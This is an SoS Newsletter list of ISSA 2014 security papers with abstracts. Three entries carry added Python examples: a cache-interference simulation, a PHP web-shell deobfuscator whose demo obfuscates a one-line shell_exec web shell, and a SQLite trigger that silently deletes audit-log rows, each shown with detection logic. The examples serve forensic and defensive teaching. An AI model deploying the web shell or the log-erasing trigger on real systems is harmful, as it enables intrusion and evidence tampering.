
SoS Newsletter - Advanced Book Block

Information Security for South Africa

The conference on Information Security for South Africa (ISSA), 2014, was held 13-14 August 2014 at Johannesburg, South Africa. The 2014 conference was held under the auspices of the University of Johannesburg Academy for Computer Science and Software Engineering, the University of South Africa School of Computing and the University of Pretoria Department of Computer Science. The works cited here are more technical and general in nature and do not include many excellent papers focused on the unique issues of South Africa.


Valjarevic, Aleksandar; Venter, Hein S.; Ingles, Melissa, "Towards a Prototype For Guidance And Implementation Of A Standardized Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014, pp. 1-8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950488 Performing a digital forensic investigation requires a standardized and formalized process to be followed. There currently is neither an international standard formalizing such a process, nor does a global, harmonized digital forensic investigation process exist. Further, there exists no application that would guide a digital forensic investigator to efficiently implement such a process. This paper proposes the implementation of such a prototype in order to cater for this need. A comprehensive and harmonized digital forensic investigation process model has been proposed by the authors in their previous work, and this model is used as the basis of the prototype. The prototype is in the form of a software application which would have two main functionalities. The first functionality would be to act as an expert system that can be used for guidance and training of novice investigators. The second functionality would be to enable reliable logging of all actions taken within the processes proposed in the comprehensive and harmonized digital forensic investigation process model. Ultimately, the latter functionality would enable the validation of use of a proper process. The benefits of such a prototype include possible improvement in efficiency and effectiveness of an investigation, due to the fact that clear guidelines will be provided for following the process over the course of the investigation. Another benefit is easier training of novice investigators. The last, and possibly most important, benefit is that higher admissibility of digital evidence, as well as of the results and conclusions of digital forensic investigations, will be possible, because it will be easier to show that the correct standardized process was followed.

Keywords: Analytical models; Cryptography; ISO/IEC 27043; digital forensic investigation process model; digital forensics; harmonization; implementation prototype; standardization (ID#: 14-3404)



Trenwith, Philip M.; Venter, Hein S., "A Digital Forensic Model For Providing Better Data Provenance In The Cloud," Information Security for South Africa (ISSA), 2014, pp. 1-6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950489 The cloud has made digital forensic investigations exceedingly difficult due to the fact that data may be spread over an ever-changing set of hosts and data centres. The normal search and seizure approach that digital forensic investigators tend to follow does not scale well in the cloud because it is difficult to identify the physical devices that data resides on. In addition, the location of these devices is often unknown or unreachable. A solution to identifying the physical device can be found in data provenance. Similar to the tags included in an email header, indicating where the email originated, a tag added to data, as it is passed on by nodes in the cloud, identifies where the data came from. If such a trace can be provided for data in the cloud it may ease the investigating process by indicating where the data can be found. In this research the authors propose a model that aims to identify the physical location of data, both where it originated and where it has been as it passes through the cloud. This is done through the use of data provenance. The data provenance records will provide digital investigators with a clear record of where the data has been and where it can be found in the cloud.

Keywords: Cloud computing; Computational modeling; Computers; Digital forensics; Open systems; Protocols; Servers; Cloud Computing; Digital Forensic Investigation; Digital Forensics; annotations; bilinear pairing technique; chain of custody; data provenance (ID#: 14-3405)



Mpofu, Nkosinathi; van Staden, Wynand JC, "A Survey Of Trust Issues Constraining The Growth Of Identity Management-as-a-Service (IdMaaS)," Information Security for South Africa (ISSA), 2014, pp. 1-6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950490 Identity management-as-a-service (IdMaaS) is a cloud computing service where the identity management function is moved to the cloud, streamlining the responsibilities of the computing or IT departments of organisations. IdMaaS's attractiveness leans on reduced cost of ownership, little to no capital investment, scalability, self-service, location independence and rapid deployment; however, its growth has been impeded by issues, most of which are related to security, privacy and trust. Most organisations view identities as passports to key computing resources (hardware, software and data); as such, they view identity management as a core IT function which must remain within the perimeter of their sphere of control. This paper primarily aims to discuss IdMaaS and highlight the major trust issues in current cloud computing environments affecting the growth of IdMaaS, by describing IdMaaS and surveying the trust issues that pose threats to its growth. Highlighting the trust issues hampering the growth of IdMaaS will lay a foundation for subsequent research efforts directed at addressing trust issues and therefore enhancing the growth of IdMaaS. Consequently, the growth of IdMaaS will open up a new entrepreneurial avenue for service providers, at the same time enabling IdMaaS consumers to realise the benefits which come along with cloud computing. In future, we will analyse and evaluate the extent of the impact posed by each trust issue to IdMaaS.

Keywords: Authentication; Authorization; Availability; Cloud computing; identity management; identity management-as-a-service; trust (ID#: 14-3406)



Mumba, Emilio Raymond; Venter, H.S., "Mobile Forensics Using The Harmonised Digital Forensic Investigation Process," Information Security for South Africa (ISSA), 2014, pp. 1-10, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950491 Mobile technology is among the fastest developing technologies that have changed the way we live our daily lives. Over the past few years, mobile devices have become the most popular form of communication around the world. However, bundled together with the good and advanced capabilities of mobile technology, mobile devices can also be used to perform various activities that may be of malicious intent or criminal in nature. This makes mobile devices a valuable source of digital evidence. For this reason, the technological evolution of mobile devices has raised the need to develop standardised investigation process models and procedures within the field of digital forensics. This need further supports the fact that forensic examiners and investigators face challenges when performing data acquisition in a forensically sound manner from mobile devices. This paper, therefore, aims at testing the harmonised digital forensic investigation process through a case study of a mobile forensic investigation. More specifically, an experiment was conducted that aims at testing the performance of the harmonised digital forensic investigation process (HDFIP) as stipulated in the ISO/IEC 27043 draft international standard through the extraction of potential digital evidence from mobile devices.

Keywords: ISO standards; Performance evaluation; Harmonised Digital Forensic Investigation Process (HDFIP); ISO/IEC 27043; mobile device; mobile forensics (ID#: 14-3407)



Schnarz, Pierre; Fischer, Clemens; Wietzke, Joachim; Stengel, Ingo, "On a Domain Block Based Mechanism To Mitigate DoS Attacks On Shared Caches In Asymmetric Multiprocessing Multi Operating Systems," Information Security for South Africa (ISSA), 2014, pp. 1-8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950494 Asymmetric multiprocessing (AMP) based multi-OSs are going to be established in future to enable parallel execution of different functionalities while fulfilling requirements for real-time, reliability, trustworthiness and security. Especially for in-car multimedia systems, also known as In-Vehicle Infotainment (IVI) systems, the composition of different OS-types onto a system-on-chip (SoC) offers a wide variety of advantages in embedded system development. However, the asymmetric paradigm, which implies the division and assignment of every hardware resource to OS-domains, is not applicable to every part of a system-on-chip (SoC). Caches are often shared between multiple processors on multi-processor SoCs (MP-SoC). According to their association to the main memory, OSs running on the processor cores are naturally vulnerable to DoS attacks. An adversary who has compromised one of the OS-domains is able to attack an arbitrary memory location of a co-OS-domain. This introduces performance degradations on the victim's memory accesses. In this work a method is proposed which prohibits the surface for interference introduced by the association of cache and main memory. Therefore, the contribution of this article is twofold. It introduces an attack vector, by deriving an algorithm from the cache way associativity, to affect the co-OSs running on the same platform. Using this vector it is shown that the mapping of contiguous memory blocks intensifies the effect. Subsequently, a memory mapping method is proposed which mitigates the interference effects of cache coherence. The approach is evaluated by a proof-of-concept implementation, which illustrates the performance impact of the attack and the countermeasure, respectively. The method enables a more reliable implementation of AMP-based multi-OSs on MP-SoCs using shared caches without the need to modify the hardware layout.

Keywords: Computer architecture; Computer crime; Hardware; Interference; Program processors; System-on-chip; Vectors (ID#: 14-3408)
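The mechanism the abstract describes (an attacker domain thrashing the cache sets its co-domain depends on, and a memory mapping that keeps the domains' sets apart) can be made concrete with a small simulation. The block below is an added example written for this newsletter, not the authors' proof-of-concept code: the cache geometry (128 sets, 4 ways, 64-byte lines, 4 KiB pages), the LRU policy, the victim's 16-line working set and the attacker's sweep pattern are all assumptions chosen to make the interference visible, and the mitigation shown is a set-partitioning (cache colouring) of each domain's physical pages, which is one way to implement a domain-block mapping; the paper's own mapping may differ in detail.

```python
"""Toy set-associative cache shared by two OS domains (added example).

The attacker sweeps its own pages so that every set it can reach receives
WAYS distinct lines per round, which is what a thrash derived from the
associativity looks like.  With a contiguous page allocation both domains
share every set; with a set-partitioned allocation they share none.
"""
from collections import OrderedDict

LINE_BYTES = 64      # cache line size (assumed)
NUM_SETS = 128       # number of sets (assumed)
WAYS = 4             # associativity (assumed)
PAGE_BYTES = 4096    # physical page size (assumed)
PAGES_PER_DOMAIN = 8

# 128 sets x 64 B = 8 KiB per way, so one 4 KiB page covers only half the
# sets: even-numbered pages hit sets 0..63, odd-numbered pages hit 64..127.


class SharedCache:
    """Physically indexed, LRU-replaced cache; each set is an LRU-ordered dict."""

    def __init__(self):
        self.sets = [OrderedDict() for _ in range(NUM_SETS)]

    def access(self, addr):
        """Touch one byte address; return True on hit, False on miss."""
        line = addr // LINE_BYTES
        s = self.sets[line % NUM_SETS]
        if line in s:
            s.move_to_end(line)
            return True
        if len(s) >= WAYS:
            s.popitem(last=False)        # evict the least recently used line
        s[line] = True
        return False


def contiguous_mapping(n=PAGES_PER_DOMAIN):
    """Naive AMP mapping: each domain gets one contiguous physical block."""
    return {"victim": list(range(0, n)), "attacker": list(range(n, 2 * n))}


def set_partitioned_mapping(n=PAGES_PER_DOMAIN):
    """Domain-block mapping: pages are handed out so that the two domains'
    lines never share a cache set (victim: even pages, attacker: odd pages)."""
    return {"victim": [2 * i for i in range(n)],
            "attacker": [2 * i + 1 for i in range(n)]}


def page_lines(page):
    """Byte address of every cache line in a physical page."""
    return [page * PAGE_BYTES + i * LINE_BYTES
            for i in range(PAGE_BYTES // LINE_BYTES)]


def victim_misses(mapping, rounds=10, working_set=16):
    """Victim repeatedly touches a small working set in its first page while
    the attacker sweeps all of its pages.  Returns the victim's cache misses
    after the warm-up round (round 0 is not counted)."""
    cache = SharedCache()
    victim = page_lines(mapping["victim"][0])[:working_set]
    attacker = [a for p in mapping["attacker"] for a in page_lines(p)]
    misses = 0
    for rnd in range(rounds):
        for a in victim:
            if not cache.access(a) and rnd > 0:
                misses += 1
        for a in attacker:
            cache.access(a)
    return misses


if __name__ == "__main__":
    print("contiguous mapping :", victim_misses(contiguous_mapping()))
    print("partitioned mapping:", victim_misses(set_partitioned_mapping()))
```

Under the contiguous mapping the attacker's even-numbered pages put four lines into each of sets 0..63 every round, so the victim's line is always the LRU entry when the fourth arrives and is evicted: the victim misses on every access after warm-up. Under the partitioned mapping the attacker can only reach sets 64..127 and the victim's working set stays resident, without any change to the cache hardware.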



Wrench, Peter M.; Irwin, Barry V.W., "Towards a Sandbox For The Deobfuscation And Dissection of PHP Malware," Information Security for South Africa (ISSA), 2014, pp. 1-8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950504 The creation and proliferation of PHP-based Remote Access Trojans (or web shells) used in both the compromise and post-exploitation of web platforms has fuelled research into automated methods of dissecting and analysing these shells. Current malware tools disguise themselves by making use of obfuscation techniques designed to frustrate any efforts to dissect or reverse engineer the code. Advanced code engineering can even cause malware to behave differently if it detects that it is not running on the system for which it was originally targeted. To combat these defensive techniques, this paper presents a sandbox-based environment that aims to accurately mimic a vulnerable host and is capable of semi-automatic semantic dissection and syntactic deobfuscation of PHP code.

Keywords: Arrays; Databases; Decoding; Malware; Process control; Semantics; Software; Code deobfuscation; Reverse engineering; Sandboxing (ID#: 14-3409)
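The "syntactic deobfuscation" the abstract refers to is, in the common case, peeling stacked `eval(decoder(decoder('literal')))` wrappers without executing them. The block below is an added example written for this newsletter, not the authors' sandbox: a Python emulation of the PHP decoders most often stacked around a web shell (`base64_decode`, `gzinflate`, `gzuncompress`, `str_rot13`, `strrev`) driven by a regular expression that recognises the wrapper shape. The two-layer sample shell is constructed inside the block for the demonstration, and the watch list of dangerous calls flagged in the recovered code is an assumption, not a list from the paper.

```python
"""Static peeling of layered eval() wrappers in PHP web shells (added example)."""
import base64
import re
import zlib

# str_rot13 as a byte translation table
ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)

# PHP decoder emulations, all operating on bytes
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, as PHP gzinflate()
    "gzuncompress": zlib.decompress,                  # zlib-wrapped, as PHP gzuncompress()
    "str_rot13": lambda b: b.translate(ROT13),
    "strrev": lambda b: b[::-1],
}

# eval( f1( f2( ... 'literal' ) ) );   optionally inside <?php ... ?>
WRAPPER = re.compile(
    r"""^\s*(?:<\?php\s+)?eval\s*\(\s*((?:[A-Za-z0-9_]+\s*\(\s*)*)(['"])(.*?)\2\s*\)+\s*;?\s*(?:\?>)?\s*$""",
    re.S,
)

# Calls worth flagging in recovered code (assumed watch list)
WATCH = ("eval", "assert", "system", "exec", "shell_exec", "passthru", "popen", "proc_open")


def peel(code: str):
    """Unwrap nested eval() wrappers statically.  Returns (recovered_code, layers),
    where layers lists the decoder chain of each wrapper, outermost first."""
    layers = []
    while True:
        m = WRAPPER.match(code)
        if not m:
            return code, layers
        chain = re.findall(r"[A-Za-z0-9_]+", m.group(1))
        data = m.group(3).encode("latin-1")
        for fn in reversed(chain):          # innermost call is applied first
            if fn not in DECODERS:
                raise ValueError(f"no emulation for {fn}()")
            data = DECODERS[fn](data)
        layers.append(chain)
        code = data.decode("latin-1")


def suspicious_calls(code: str):
    """Names from WATCH that are called in the code, sorted."""
    return sorted(fn for fn in WATCH if re.search(r"\b%s\s*\(" % fn, code))


def _gzdeflate(b: bytes) -> bytes:
    """PHP gzdeflate(): raw DEFLATE stream without the zlib header."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(b) + c.flush()


def build_sample(payload: str) -> str:
    """Constructed two-layer obfuscation of `payload` for the demo:
    rot13(base64(eval(gzinflate(base64_decode(deflate(payload))))))."""
    inner = "eval(gzinflate(base64_decode('%s')));" % (
        base64.b64encode(_gzdeflate(payload.encode())).decode())
    outer = base64.b64encode(inner.encode()).translate(ROT13).decode()
    return "<?php eval(base64_decode(str_rot13('%s'))); ?>" % outer


# Constructed one-line shell body used as the demo payload (eval() takes bare
# PHP code, hence no <?php tag inside the literal).
PAYLOAD = "if(isset($_REQUEST['c'])){echo shell_exec($_REQUEST['c']);}"
SAMPLE = build_sample(PAYLOAD)

if __name__ == "__main__":
    recovered, layers = peel(SAMPLE)
    print("layers   :", layers)
    print("recovered:", recovered)
    print("flags    :", suspicious_calls(recovered))
```

Because the decoders are emulated rather than run in PHP, the peeling is purely syntactic and cannot be influenced by the host-fingerprinting behaviour the abstract mentions; the trade-off is that a wrapper using a decoder outside `DECODERS`, or a key derived at runtime, stops the loop, which is exactly where a sandbox that mimics the targeted host has to take over.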



Ophoff, Jacques; Robinson, Mark, "Exploring End-User Smartphone Security Awareness Within A South African Context," Information Security for South Africa (ISSA), 2014, pp. 1-7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950500 International research has shown that users are complacent when it comes to smartphone security behaviour. This is contradictory, as users perceive data stored on the 'smart' devices to be private and worth protecting. Traditionally less attention is paid to human factors compared to technical security controls (such as firewalls and antivirus), but there is a crucial need to analyse human aspects as technology alone cannot deliver complete security solutions. Increasing a user's knowledge can improve compliance with good security practices, but for trainers and educators to create meaningful security awareness materials they must have a thorough understanding of users' existing behaviours, misconceptions and general attitude towards smartphone security.

Keywords: Context; Portable computers; Security; Awareness and Training in Security; Mobile Computing Security; Smartphone (ID#: 14-3410)



Hauger, Werner K.; Olivier, Martin S., "The Role Of Triggers In Database Forensics," Information Security for South Africa (ISSA), 2014, pp. 1-7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950506 An aspect of database forensics that has not received much attention in the academic research community yet is the presence of database triggers. Database triggers and their implementations have not yet been thoroughly analysed to establish what possible impact they could have on digital forensic analysis methods and processes. Conventional database triggers are defined to perform automatic actions based on changes in the database. These changes can be on the data level or the data definition level. Digital forensic investigators might thus feel that database triggers do not have an impact on their work: they are simply interrogating the data and metadata without making any changes. This paper attempts to establish if the presence of triggers in a database could potentially disrupt, manipulate or even thwart forensic investigations. The database triggers as defined in the SQL standard were studied together with a number of database trigger implementations. This was done in order to establish what aspects might have an impact on digital forensic analysis. It is demonstrated in this paper that some of the current database forensic analysis methods are impacted by the possible presence of certain types of triggers in a database. Furthermore, it finds that the forensic interpretation and attribution processes should be extended to include the handling and analysis of database triggers if they are present in a database.

Keywords: Databases; Dictionaries; Forensics; Monitoring; Reliability; database forensics; database triggers; digital forensic analysis; methods; processes (ID#: 14-3411)
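One way a trigger undermines interpretation and attribution is by acting on the evidence an investigator trusts most, the audit trail, at the moment it is written. The block below is an added example written for this newsletter, not code from the paper: a constructed SQLite ledger with a legitimate application trigger that logs every balance change, and a second, anti-forensic trigger that discards the audit rows for one account as soon as they are inserted. The schema, account names and seed balance are all constructed; reading `audit_log` alone attributes no change to that account, whereas enumerating triggers from the data dictionary and reconciling the table against the log exposes both the gap and its cause.

```python
"""Database triggers versus forensic interpretation, on SQLite (added example)."""
import sqlite3

SCHEMA = """
CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, balance INTEGER);
CREATE TABLE audit_log (id INTEGER PRIMARY KEY, action TEXT, detail TEXT);

-- Legitimate application trigger: every balance change is logged.
CREATE TRIGGER log_balance AFTER UPDATE OF balance ON accounts
BEGIN
  INSERT INTO audit_log(action, detail)
  VALUES ('update', 'account ' || NEW.id || ' ' || OLD.balance || '->' || NEW.balance);
END;

-- Anti-forensic trigger (constructed for the demo): audit rows about
-- account 7 are deleted the moment they are written, so the log never
-- shows them although the balance did change.
CREATE TRIGGER hide_account_7 AFTER INSERT ON audit_log
WHEN NEW.detail LIKE 'account 7 %'
BEGIN
  DELETE FROM audit_log WHERE id = NEW.id;
END;
"""

SEED_BALANCE = 100   # every account starts here (constructed baseline)


def build_db():
    """In-memory database with the constructed schema and two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [(1, "alice", SEED_BALANCE), (7, "mallory", SEED_BALANCE)])
    conn.commit()
    return conn


def apply_updates(conn):
    """Two ordinary application updates; both should be audited."""
    conn.execute("UPDATE accounts SET balance = balance - 40 WHERE id = 1")
    conn.execute("UPDATE accounts SET balance = balance + 40 WHERE id = 7")
    conn.commit()


def audit_trail(conn):
    """What an investigator sees when only the audit table is read."""
    return [row[0] for row in conn.execute("SELECT detail FROM audit_log ORDER BY id")]


def list_triggers(conn):
    """Trigger enumeration from the data dictionary: (name, table, sql)."""
    return conn.execute(
        "SELECT name, tbl_name, sql FROM sqlite_master WHERE type = 'trigger' ORDER BY name"
    ).fetchall()


def unexplained_changes(conn):
    """Accounts whose balance moved off the baseline without any audit row."""
    rows = conn.execute(
        "SELECT a.id FROM accounts a WHERE a.balance != ? AND NOT EXISTS ("
        "  SELECT 1 FROM audit_log l WHERE l.detail LIKE 'account ' || a.id || ' %')"
        " ORDER BY a.id",
        (SEED_BALANCE,),
    )
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_db()
    apply_updates(db)
    print("audit trail:", audit_trail(db))
    print("triggers   :", [t[0] for t in list_triggers(db)])
    print("unexplained:", unexplained_changes(db))
```

The same pattern applies to other engines: the data-dictionary query changes (for example `information_schema.triggers` in PostgreSQL and MySQL), but the forensic step is identical, so trigger enumeration belongs in the acquisition checklist alongside the tables, and any reconstruction of "who changed what" has to consider that the trigger body, not the application statement, may have produced or removed the stored row.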



Savola, Reijo M.; Kylanpaa, Markku, "Security Objectives, Controls And Metrics Development For An Android Smartphone Application," Information Security for South Africa (ISSA), 2014, pp. 1-8, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950501 Security in Android smartphone platforms deployed in public safety and security mobile networks is a remarkable challenge. We analyse the security objectives and controls for these systems based on an industrial risk analysis. The target system of the investigation is an Android platform utilized for a public safety and security mobile network. We analyse how security decision-making regarding this target system can be supported by effective and efficient security metrics. In addition, we describe implementation details of security controls for the authorization and integrity objectives of a demonstration of the target system.

Keywords: Authorization; Libraries; Monitoring; Android; risk analysis; security effectiveness; security metrics; security objectives (ID#: 14-3412)



Haffejee, Jameel; Irwin, Barry, "Testing Antivirus Engines To Determine Their Effectiveness As A Security Layer," Information Security for South Africa (ISSA), 2014, pp. 1-6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950496 This research has been undertaken to empirically test the assumption that it is trivial to bypass an antivirus application and to gauge the effectiveness of antivirus engines when faced with a number of known evasion techniques. A known malicious binary was combined with evasion techniques and deployed against several antivirus engines to test their detection ability. The research also documents the process of setting up an environment for testing antivirus engines as well as building the evasion techniques used in the tests. This environment facilitated the empirical testing needed to determine whether antivirus security controls could easily be bypassed. The results of the empirical tests are also presented in this research and demonstrate that it is indeed within reason that an attacker can evade multiple antivirus engines without much effort. As such, while an antivirus application is useful for protecting against known threats, it does not work as effectively against unknown threats.

Keywords: Companies; Cryptography; Engines; Malware; Payloads; Testing; Antivirus; Defense; Malware (ID#: 14-3413)



van Staden, Wynand JC, "An Investigation Into Reducing Third Party Privacy Breaches During The Investigation Of Cybercrime," Information Security for South Africa (ISSA), 2014, pp. 1-6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950503 In this article we continue previous work in which a framework was proposed for preventing or limiting a privacy breach of a third party during the investigation of cybercrime. The investigations may be conducted internally (by the enterprise), or externally (by a third party, or a law enforcement agency) depending on the jurisdiction and context of the case. In many cases, an enterprise will conduct an internal investigation against some allegation of wrongdoing by an employee, or a client. In these cases maintaining the privacy promise made to other clients or customers is an ideal that the enterprise may wish to honour, especially if the image or brand of the enterprise may be impacted when the details of the process followed during the investigation become clear. The article reports on the results of the implementation of the privacy breach detection; it also includes lessons learned, and proposes further steps for refining the breach detection techniques and methods for future digital forensic investigation.

Keywords: Business; Context; Digital forensics; Electronic mail; Indexes; Postal services; Privacy; Cybercrime; Digital Forensics; Privacy; Privacy Breach; Third Party Privacy (ID#: 14-3414)



Mirza, Abdul; Senekane, Makhamisa; Petruccione, Francesco; van Niekerk, Brett, "Suitability of Quantum Cryptography For National Facilities," Information Security for South Africa (ISSA), 2014, pp. 1-7, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950513 Quantum cryptography, or more accurately Quantum Key Distribution (QKD), provides a secure mechanism to exchange encryption keys which can detect potential eavesdroppers. However, this is a relatively new technology in terms of implementation, and there are some concerns over possible attacks. This paper describes QKD and provides an overview of the implementations in South Africa. From this, a basic vulnerability assessment is performed to determine the suitability of QKD for use in critical national facilities. While there are vulnerabilities, some of these can be easily mitigated through proper design and planning. The implementation of QKD as an additional layer to the encryption process may serve to improve the security between national key points.

Keywords: Cryptography; Educational institutions; Quantum mechanics; critical infrastructure protection; quantum cryptography; quantum key distribution; vulnerability assessment (ID#: 14-3415)



du Plessis, Warren P., "Software-Defined Radio (SDR) As A Mechanism For Exploring Cyber-Electronic Warfare (EW) Collaboration," Information Security for South Africa (ISSA), 2014, pp. 1-6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950516 Cyber is concerned with networks of systems in all their possible forms. Electronic warfare (EW) is focused on the many different uses of the electromagnetic spectrum (EMS). Given that many networks make use of the EMS (wireless networks), there is clearly large scope for collaboration between the cyber-warfare and EW communities. Unfortunately, such collaboration is complicated by the significant differences between these two realms. Software-defined radio (SDR) systems are based on interfaces between the EMS and computers and thus offer tremendous potential for encouraging cyber-EW collaboration. The concept of SDR is reviewed along with some hardware and software SDR systems. These are then used to propose a number of projects where SDR systems allow collaboration between the cyber and EW realms to achieve effects which neither realm could achieve alone.

Keywords: Bandwidth; Collaboration; Computers; Hardware; Protocols; Software; Standards; Electronic warfare (EW); cyber; electromagnetic spectrum (EMS); software-defined radio (SDR) (ID#: 14-3416)



Tekeni, Luzuko; Thomson, Kerry-Lynn; Botha, Reinhardt A., "Concerns Regarding Service Authorization By IP Address Using Eduroam," Information Security for South Africa (ISSA), 2014, pp. 1-6, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950495 Eduroam is a secure WLAN roaming service between academic and research institutions around the globe. It allows users from participating institutions secure Internet access at any other participating visited institution using their home credentials. The authentication credentials are verified by the home institution, while authorization is done by the visited institution. The user receives an IP address in the range of the visited institution, and accesses the Internet through the firewall and proxy servers of the visited institution. However, access granted to services that authorize via an IP address of the visited institution may include access to services that are not allowed at the home institution, due to legal agreements. This paper looks at typical legal agreements with service providers and explores the risks and countermeasures that need to be considered when using eduroam.

Keywords: Servers; Authorization; IP-Based; Service Level Agreement; eduroam (ID#: 14-3417)



Mouton, Francois; Malan, Mercia M.; Leenen, Louise; Venter, H.S., "Social Engineering Attack Framework," Information Security for South Africa (ISSA), 2014, pp. 1-9, 13-14 Aug. 2014. doi: 10.1109/ISSA.2014.6950510 The field of information security is a fast growing discipline. Even though the effectiveness of security measures to protect sensitive information is increasing, people remain susceptible to manipulation and the human element is thus a weak link. A social engineering attack targets this weakness by using various manipulation techniques in order to elicit sensitive information. The field of social engineering is still in its infancy with regard to formal definitions and attack frameworks. This paper proposes a social engineering attack framework based on Kevin Mitnick's social engineering attack cycle. The attack framework addresses shortcomings of Mitnick's social engineering attack cycle and focuses on every step of the social engineering attack, from determining the goal of an attack up to the successful conclusion of the attack. The authors use a previously proposed social engineering attack ontological model which provides a formal definition for a social engineering attack. The ontological model contains all the components of a social engineering attack, and the social engineering attack framework presented in this paper is able to represent temporal data such as flow and time. Furthermore, this paper demonstrates how historical social engineering attacks can be mapped to the social engineering attack framework. By combining the ontological model and the attack framework, one is able to generate social engineering attack scenarios and to map historical social engineering attacks to a standardised format. Scenario generation and analysis of previous attacks are useful for the development of awareness, training purposes and the development of countermeasures against social engineering attacks.

Keywords: Data models; Electronic mail; Information security; Vectors; Bidirectional Communication; Indirect Communication; Mitnick's Attack Cycle; Ontological Model; Social Engineering; Social Engineering Attack; Social Engineering Attack Framework; Unidirectional Communication (ID#: 14-3418)



Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.